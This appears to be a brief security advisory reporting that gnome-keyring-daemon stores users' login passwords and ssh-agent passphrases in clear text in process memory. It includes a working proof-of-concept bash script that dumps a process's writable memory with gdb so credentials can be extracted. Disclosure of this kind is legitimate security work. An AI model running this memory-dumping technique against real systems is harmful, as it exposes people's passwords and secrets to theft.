|
gnome-keyring-daemon is vulnerable to local credentials disclosure.
Fortunately the attack can be spun on already compromised machines,
but sadly, in those cases, an attacker can leaverage on
gnome-keyring-daemon to obtain sensible data.
The application store
password of logged users in clear text in the process memory, hence
expose this information (such of login password, passphrase of
ssh-agent, etc.) to an attacker.
In this scenario, he can read those
data instantly without cracking it or install keylogger, sniffer and
variuos tools, but using gnome-keyring-daemon in order to obtain this
informations, that can be extracted from memory using a debugger (such
of "gdb").
At this URL, there is a script (named "memory_dump.sh")
that can be used as PoC:
http://www.lucaercoli.it/
memory_dump.sh:
#!/bin/bash
mkdir $1
cd $1
grep rw-p /proc/$1/maps \
| awk '{print $1}' \
| sed 's/-/ /' \
| while read mem_start mem_end; do gdb --pid $1 --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"; done
|